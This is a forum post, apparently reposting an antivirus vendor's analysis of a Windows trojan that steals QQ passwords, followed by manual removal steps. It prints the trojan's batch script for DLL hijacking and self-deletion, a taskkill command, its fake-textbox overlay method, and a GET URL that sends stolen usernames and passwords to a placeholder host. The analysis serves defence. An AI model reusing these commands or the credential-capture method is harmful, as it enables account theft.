本帖最后由 flyleaf 于 2011-10-14 09:51 编辑
病毒标签:
病毒名称:Trojan/Win32.QQpass.wsy[stealer]
病毒类型: 盗号木马
文件 MD5:119F88734602DF573780149C3DB4204A
公开范围: 完全公开
危害等级: 3
文件长度: 290,837 字节
感染系统: Windows 98以上版本
开发工具: Microsoft Visual C++ 5.0
加壳类型: 无
病毒描述:
该病毒是一个盗号木马,图标伪装为画笔文件图标。运行后结束QQ进程,迫使用户重新登录QQ,从而达到窃取密码的目的。恶意程序创建一个文本框覆盖在QQ原输入框之上来获取QQ密码,并通过Hook腾讯QQ的窗口消息来对假冒文本框进行定位。将盗取的QQ账号与密码以Get方式发送到指定地址。
行为分析-本地行为
1.恶意程序运行后衍生以下文件:
% QQ%\Bin\comres.dll (用作镜像劫持替代系统的comres.dll)
%QQ%\Bin\JoachimPeiper.dat (数据文件)
%windows%\JoachimPeiper.dat (对文件%QQ%\Bin\JoachimPeiper.dat的备份)
%windows%\ rxing.bat (对文件% QQ%\Bin\comres.dll的备份)
%windows%\ mssoft.bat (用于结束QQ进程的批处理文件)
%HomeDrive%\nod816.bat (文件路径布置批处理文件)
%HomeDrive%\stter.exe (主要功能文件,PE可执行文件)
2.%HomeDrive%\nod816.bat文件内容及功能。
Move %QQ%\bin\shengod.dat %QQ%\bin\comres.dll
move d:\fdsf.bmp d:\fdsf.bmp
move d:\fdsf.bmp d:\fdsf.bmp
del %system32%\dllcache\comres.dll
move %system32%\comres.dll %WINDOWS%\hexil.dll
move %WINDOWS%\rxing.bat %system32%\comres.dll
copy %WINDOWS%\hexil.dll %QQ%\bin\hexil.dll
copy %WINDOWS%\hexil.dll d:\fdsf.bmp
copy %WINDOWS%\hexil.dll d:\fdsf.bmp
del %0
功能:主要是进行了文件路径的布置。
3.%windows%\mssoft.bat文件内容及功能。
taskkill /f /im qq.exe /t
功能:结束QQ进程。
4.恶意程序的进程操作
创建IE进程并将恶意代码写入其中,监听本机UDP:1488端口,IE进程通过以下参数创建。
"%Program Files%\Internet Explorer\iexplore.exe" SCODEF:3208 CREDAT:14337
5.恶意程序的盗取方式
将%HomeDrive%\stter.exe文件注入到QQ进程中执行,并创建钩子来监控QQ登录窗口。如果发现,则创建一个文本框覆盖在QQ原输入框之上,用以截获用户输入的用户名密码。然后尝试解析域名为www.xxx.com的主机地址,并将获得的用户名密码以GET方式发送到指定的地址。
行为分析-网络行为:
协议:HTTP
端口:80
连接域名: www.xxx.com
描述:通过GET方式进行提交.
http://www.xxx.com/qq080910/mail ... er=%s&QQPassWord=%s
注:以上连接中的%s为恶意程序盗取的QQ用户名及密码的字符串形式。
注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32,windows95/98/me中默认的安装路径是C:\Windows\System,windowsXP中默认的安装路径是C:\Windows\System32。
%Temp% = C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户TEMP缓存变量
%Windir%\ WINDODWS所在目录
%DriveLetter%\ 逻辑驱动器根目录
%ProgramFiles%\ 系统程序默认安装目录
%HomeDrive% = C:\ 当前启动的系统的所在分区
%Documents and Settings%\ 当前用户文档根目录
清除方案
1、使用安天防线可彻底清除此病毒(推荐),请点击下载(http://www.antiyfx.com)。
2、手工清除请按照行为分析删除对应文件,恢复相关系统文件。
( 1 )结束QQ.exe进程。
( 2 )删除恶意程序衍生文件。
%QQ%\Bin\comres.dll
%QQ%\Bin\JoachimPeiper.dat
%windows%\JoachimPeiper.dat
%windows%\rxing.bat
%windows%\mssoft.bat
%HomeDrive%\nod816.bat
%HomeDrive%\stter.exe
( 3)下载原始comres.dll文件拷贝到以下目录,用以替换病毒文件:
%system32%\dllcache\comres.dll
( 4 )重新启动计算机。 |
|